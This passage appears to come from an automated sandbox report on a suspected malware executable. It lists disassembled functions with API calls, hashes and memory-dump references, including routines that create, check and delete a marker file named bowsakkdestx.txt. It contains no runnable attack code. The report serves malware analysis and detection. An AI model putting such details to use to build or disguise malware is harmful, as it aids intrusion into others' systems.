                                                                                                                                        • Instruction Fuzzy Hash: 3501A931B80308B7EB205B95ED8AF973B6DEB44B00F144061FA04EF1E1D7F5A8468BA4
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00417BA0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 188COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1240243875.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.1240243875.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.1240243875.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _memmove
                                                                                                                                        • String ID: invalid string position$string too long
                                                                                                                                        • API String ID: 4104443479-4289949731
                                                                                                                                        • Opcode ID: b2c1af29de5962b74b57e5661815869f54c56e8a90a0ab9c91a19098a667a223
                                                                                                                                        • Instruction ID: 16eedd03d570a769cf24423414cb71a1906862ef28ca1dd771941f38c47b8a04
                                                                                                                                        • Opcode Fuzzy Hash: b2c1af29de5962b74b57e5661815869f54c56e8a90a0ab9c91a19098a667a223
                                                                                                                                        • Instruction Fuzzy Hash: C451C3317081089BDB24CE1CD980AAA77B6EF85714B24891FF856CB381DB35EDD18BD9
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00414160 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 120COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1240243875.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.1240243875.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.1240243875.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _memmove
                                                                                                                                        • String ID: invalid string position$string too long
                                                                                                                                        • API String ID: 4104443479-4289949731
                                                                                                                                        • Opcode ID: 1860cadd0784f8812835e732d2f60387060861baec5cac242feb419a09eb11c6
                                                                                                                                        • Instruction ID: c789d4a5c221ce0c411dffae1b259be01e75b302f83ceaf2f45b858c9c7e4579
                                                                                                                                        • Opcode Fuzzy Hash: 1860cadd0784f8812835e732d2f60387060861baec5cac242feb419a09eb11c6
                                                                                                                                        • Instruction Fuzzy Hash: 3D311430300204ABDB28DE5CD8859AA77B6EFC17507600A5EF865CB381D739EDC18BAD
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00425341 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 91COMMONLIBRARYCODE
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1240243875.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.1240243875.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.1240243875.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _wcsnlen
                                                                                                                                        • String ID: U
                                                                                                                                        • API String ID: 3628947076-3372436214
                                                                                                                                        • Opcode ID: ddbdfe4e8834e254b395da421ec3c28ac3be050359a4b81b0499ab3bd56dfaa9
                                                                                                                                        • Instruction ID: 96f9a77ca4cc4fe958c434aa827cb810c13d5acf0ea92317e974609e7887e837
                                                                                                                                        • Opcode Fuzzy Hash: ddbdfe4e8834e254b395da421ec3c28ac3be050359a4b81b0499ab3bd56dfaa9
                                                                                                                                        • Instruction Fuzzy Hash: 6521C9717046286BEB10DAA5BC41BBB739CDB85750FD0416BFD08C6190EA79994046AD
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0045AD50 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 91COMMONLIBRARYCODE
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1240243875.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.1240243875.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.1240243875.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _memset
                                                                                                                                        • String ID: .\crypto\buffer\buffer.c$C7F
                                                                                                                                        • API String ID: 2102423945-2013712220
                                                                                                                                        • Opcode ID: fce9da4f2685e8a546a1aead5558aa77959c7a2ce52c5fe1bdde6675f364ff59
                                                                                                                                        • Instruction ID: 54406e9f1970e0e1dce797ef07034894a3cffcceb7efccd845a222dac3d76e8e
                                                                                                                                        • Opcode Fuzzy Hash: fce9da4f2685e8a546a1aead5558aa77959c7a2ce52c5fe1bdde6675f364ff59
                                                                                                                                        • Instruction Fuzzy Hash: 91216DB1B443213BE200655DFC83B15B395EB84B19F104127FA18D72C2D2B8BC5982D9
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0040C5C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        • 8a4577dc-de55-4eb5-b48a-8a3eee60cd95, xrefs: 0040C687
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1240243875.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.1240243875.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.1240243875.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: StringUuid$CreateFree
                                                                                                                                        • String ID: 8a4577dc-de55-4eb5-b48a-8a3eee60cd95
                                                                                                                                        • API String ID: 3044360575-2335240114
                                                                                                                                        • Opcode ID: 5898d431aa7bc51d8275c67bd3d0945cf80b17b08d4c1006f571a635e441fa64
                                                                                                                                        • Instruction ID: 0eb901185732211e3be4e37390737b2086ad5c5ed8a4bd7d6c842829bf201ec1
                                                                                                                                        • Opcode Fuzzy Hash: 5898d431aa7bc51d8275c67bd3d0945cf80b17b08d4c1006f571a635e441fa64
                                                                                                                                        • Instruction Fuzzy Hash: 6C21D771208341ABD7209F24D844B9BBBE8AF81758F004E6FF88993291D77A9549879A
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0040C470 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 54COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0040C48B
                                                                                                                                        • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0040C4A9
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1240243875.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.1240243875.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.1240243875.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Path$AppendFolder
                                                                                                                                        • String ID: bowsakkdestx.txt
                                                                                                                                        • API String ID: 29327785-2616962270
                                                                                                                                        • Opcode ID: cacc9ec5c69f508a09e097335cbe8ae863f85dc58f645bd4f6fa7f4b17594c00
                                                                                                                                        • Instruction ID: 3b6c08389df4e48a430741a1ce4ce94f3584f996b8880ee9781e1533d320f445
                                                                                                                                        • Opcode Fuzzy Hash: cacc9ec5c69f508a09e097335cbe8ae863f85dc58f645bd4f6fa7f4b17594c00
                                                                                                                                        • Instruction Fuzzy Hash: 8701DB72B8022873D9306A557C86FFB775C9F51721F0001B7FE08D6181E5E9554646D5
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00423B4C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 44COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • _malloc.LIBCMT ref: 00423B64
                                                                                                                                          • Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
                                                                                                                                          • Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
                                                                                                                                          • Part of subcall function 00420C62: RtlAllocateHeap.NTDLL(006B0000,00000000,00000001,?,?,?,?,00423B69,?), ref: 00420CA5
                                                                                                                                        • std::exception::exception.LIBCMT ref: 00423B82
                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00423B97
                                                                                                                                          • Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1240243875.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.1240243875.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.1240243875.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AllocateExceptionException@8HeapRaiseThrow_mallocstd::exception::exception
                                                                                                                                        • String ID: bad allocation
                                                                                                                                        • API String ID: 3074076210-2104205924
                                                                                                                                        • Opcode ID: 241cfa4299846a07ecc57268e606ba0db0d865f968b84549374c8695ce3f7968
                                                                                                                                        • Instruction ID: 445f5c97f97310cbd08f0009147839d9c604c92f3643d32107fe893a2d7397f3
                                                                                                                                        • Opcode Fuzzy Hash: 241cfa4299846a07ecc57268e606ba0db0d865f968b84549374c8695ce3f7968
                                                                                                                                        • Instruction Fuzzy Hash: 74F0F97560022D66CB00AF99EC56EDE7BECDF04315F40456FFC04A2282DBBCAA4486DD
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0041BA10 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24registryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 0041BA4A
                                                                                                                                        • RegisterClassExW.USER32(00000030), ref: 0041BA73
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1240243875.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.1240243875.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.1240243875.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ClassCursorLoadRegister
                                                                                                                                        • String ID: 0$LPCWSTRszWindowClass
                                                                                                                                        • API String ID: 1693014935-1496217519
                                                                                                                                        • Opcode ID: fbf28ebe5b3b724a216796b7602f5ba5b22e3d17e3910e7f530213bb4edbfbf6
                                                                                                                                        • Instruction ID: 39b267f2af3e8e8601893d5e13e9f0aceec8bb1d15aa8544f670d774de374bdc
                                                                                                                                        • Opcode Fuzzy Hash: fbf28ebe5b3b724a216796b7602f5ba5b22e3d17e3910e7f530213bb4edbfbf6
                                                                                                                                        • Instruction Fuzzy Hash: 64F0AFB0C042089BEB00DF90D9597DEBBB8BB08308F108259D8187A280D7BA1608CFD9
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0040C420 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 22fileCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0040C438
                                                                                                                                        • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0040C44E
                                                                                                                                        • DeleteFileA.KERNEL32(?), ref: 0040C45B
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1240243875.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.1240243875.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.1240243875.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Path$AppendDeleteFileFolder
                                                                                                                                        • String ID: bowsakkdestx.txt
                                                                                                                                        • API String ID: 610490371-2616962270
                                                                                                                                        • Opcode ID: 51c9fbb63abd04c953cc1c90cd388c2580edec88c84091088bf86cba3f20ed90
                                                                                                                                        • Instruction ID: 22f96f022367e4ecd8cb06d74e3ea6c1a096c1ee21cc35b9366b07434c4c4e8f
                                                                                                                                        • Opcode Fuzzy Hash: 51c9fbb63abd04c953cc1c90cd388c2580edec88c84091088bf86cba3f20ed90
                                                                                                                                        • Instruction Fuzzy Hash: 60E0807564031C67DB109B60DCC9FD5776C9B04B01F0000B2FF48D10D1D6B495444E55
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00419E70 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 22COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1240243875.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.1240243875.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.1240243875.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _memset
                                                                                                                                        • String ID: p2Q
                                                                                                                                        • API String ID: 2102423945-1521255505
                                                                                                                                        • Opcode ID: 46ecb9121aab2c4594d1f343841fc1340943ec8095ce101e3444a0aa36bfb78c
                                                                                                                                        • Instruction ID: 738f0ca8778653557991c93ab9a04937910ac7dae49cf0696bf478295a84fdc8
                                                                                                                                        • Opcode Fuzzy Hash: 46ecb9121aab2c4594d1f343841fc1340943ec8095ce101e3444a0aa36bfb78c
                                                                                                                                        • Instruction Fuzzy Hash: C5F03028684750A5F7107750BC667953EC1A735B08F404048E1142A3E2D7FD338C63DD
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0040ECB0 Relevance: 6.2, APIs: 4, Instructions: 204COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1240243875.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.1240243875.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.1240243875.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _memmove_strtok
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3446180046-0
                                                                                                                                        • Opcode ID: 205b1ec61ce906ac0e6ef9ac2fb6feb778f8951e500b67679f42a44b4349684c
                                                                                                                                        • Instruction ID: d0e58e2a66e8e3875a5229d26ee444e1e0210206766639419d48370c530ec9d7
                                                                                                                                        • Opcode Fuzzy Hash: 205b1ec61ce906ac0e6ef9ac2fb6feb778f8951e500b67679f42a44b4349684c
                                                                                                                                        • Instruction Fuzzy Hash: 7F81B07160020AEFDB14DF59D98079ABBF1FF14304F54492EE40567381D3BAAAA4CB96
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00422130 Relevance: 6.2, APIs: 4, Instructions: 163COMMONLIBRARYCODE
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1240243875.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.1240243875.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.1240243875.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _memset$__filbuf__getptd_noexit__read_nolock
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2974526305-0
                                                                                                                                        • Opcode ID: 2663944f2ecd2356e6bc0f9128c733698aaf16daf3cf10d514d26d316ebfdedf
                                                                                                                                        • Instruction ID: 8e6e0b0b404069c1ace538d88af1fa9e5aae20a8402e44ab6f3f0d96efeb0f41
                                                                                                                                        • Opcode Fuzzy Hash: 2663944f2ecd2356e6bc0f9128c733698aaf16daf3cf10d514d26d316ebfdedf
                                                                                                                                        • Instruction Fuzzy Hash: 9A51D830B00225FBCB148E69AA40A7F77B1AF11320F94436FF825963D0D7B99D61CB69
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0043C677 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0043C6AD
                                                                                                                                        • __isleadbyte_l.LIBCMT ref: 0043C6DB
                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 0043C709
                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 0043C73F
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1240243875.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.1240243875.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.1240243875.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3058430110-0
                                                                                                                                        • Opcode ID: 5d9d0dd00b9c666e2ffb8edf641007e90d7f333e82c154efbd4b40f2329fca1d
                                                                                                                                        • Instruction ID: 9bb69ce0c337472f3e835d3bfc0adb25a23875f1fe15b1d3b69bac0ae3c4b713
                                                                                                                                        • Opcode Fuzzy Hash: 5d9d0dd00b9c666e2ffb8edf641007e90d7f333e82c154efbd4b40f2329fca1d
                                                                                                                                        • Instruction Fuzzy Hash: 4E31F530600206EFDB218F75CC85BBB7BA5FF49310F15542AE865A72A0D735E851DF98
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0040F0E0 Relevance: 6.1, APIs: 4, Instructions: 86filestringCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • CreateFileW.KERNEL32(?,40000000,00000002,00000000,00000002,00000080,00000000), ref: 0040F125
                                                                                                                                        • lstrlenA.KERNEL32(?,?,00000000), ref: 0040F198
                                                                                                                                        • WriteFile.KERNEL32(00000000,?,00000000), ref: 0040F1A1
                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 0040F1A8
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1240243875.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.1240243875.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.1240243875.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: File$CloseCreateHandleWritelstrlen
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1421093161-0
                                                                                                                                        • Opcode ID: d7c53c20fb31498ecb2e6d2948be234b538ea12271a6e43a57747494780a16e1
                                                                                                                                        • Instruction ID: 4e0a1a2928686de7afe91093b481d52cb6f90b47dd46c4e49af8be4df8d63ea4
                                                                                                                                        • Opcode Fuzzy Hash: d7c53c20fb31498ecb2e6d2948be234b538ea12271a6e43a57747494780a16e1
                                                                                                                                        • Instruction Fuzzy Hash: DF31F531A00104EBDB14AF68DC4ABEE7B78EB05704F50813EF9056B6C0D7796A89CBA5
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 004C7094 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • ___BuildCatchObject.LIBCMT ref: 004C70AB
                                                                                                                                          • Part of subcall function 004C77A0: ___BuildCatchObjectHelper.LIBCMT ref: 004C77D2
                                                                                                                                          • Part of subcall function 004C77A0: ___AdjustPointer.LIBCMT ref: 004C77E9
                                                                                                                                        • _UnwindNestedFrames.LIBCMT ref: 004C70C2
                                                                                                                                        • ___FrameUnwindToState.LIBCMT ref: 004C70D4
                                                                                                                                        • CallCatchBlock.LIBCMT ref: 004C70F8
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1240243875.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.1240243875.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.1240243875.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Catch$BuildObjectUnwind$AdjustBlockCallFrameFramesHelperNestedPointerState
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2901542994-0
                                                                                                                                        • Opcode ID: dd3ac78af2fd1184da527a8de72168518a9c3bdc752cc05c4f080d411e07ec88
                                                                                                                                        • Instruction ID: e860502f941f6c9850043d2e9c4655f99114053cf07e0eb82383b029c5c3ae24
                                                                                                                                        • Opcode Fuzzy Hash: dd3ac78af2fd1184da527a8de72168518a9c3bdc752cc05c4f080d411e07ec88
                                                                                                                                        • Instruction Fuzzy Hash: 2C011736000108BBCF526F56CC01FDA3FAAEF48718F15801EF91866121D33AE9A1DFA5
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 004253B3 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00425007: __getptd_noexit.LIBCMT ref: 00425008
                                                                                                                                          • Part of subcall function 00425007: __amsg_exit.LIBCMT ref: 00425015
                                                                                                                                        • __calloc_crt.LIBCMT ref: 00425A01
                                                                                                                                          • Part of subcall function 00428C96: __calloc_impl.LIBCMT ref: 00428CA5
                                                                                                                                        • __lock.LIBCMT ref: 00425A37
                                                                                                                                        • ___addlocaleref.LIBCMT ref: 00425A43
                                                                                                                                        • __lock.LIBCMT ref: 00425A57
                                                                                                                                          • Part of subcall function 00425208: __getptd_noexit.LIBCMT ref: 00425208
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1240243875.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.1240243875.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.1240243875.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: __getptd_noexit__lock$___addlocaleref__amsg_exit__calloc_crt__calloc_impl
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2580527540-0
                                                                                                                                        • Opcode ID: 3969c2aeef3154995e76024b80c076f82dc7aa98e25c938a71a0b2bc9f16ca02
                                                                                                                                        • Instruction ID: 8e8bf19fb99f986105457608807abe9f1de148b308aa0ea96eb71ffb67844566
                                                                                                                                        • Opcode Fuzzy Hash: 3969c2aeef3154995e76024b80c076f82dc7aa98e25c938a71a0b2bc9f16ca02
                                                                                                                                        • Instruction Fuzzy Hash: A3018471742720DBD720FFAAA443B1D77A09F40728F90424FF455972C6CE7C49418A6D
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 004409B9 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1240243875.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.1240243875.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.1240243875.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3016257755-0
                                                                                                                                        • Opcode ID: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
                                                                                                                                        • Instruction ID: 47779ad8523d68e9f2e2bd7ddfa488ab055a33a4313e19cc57a45add4f9be60e
                                                                                                                                        • Opcode Fuzzy Hash: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
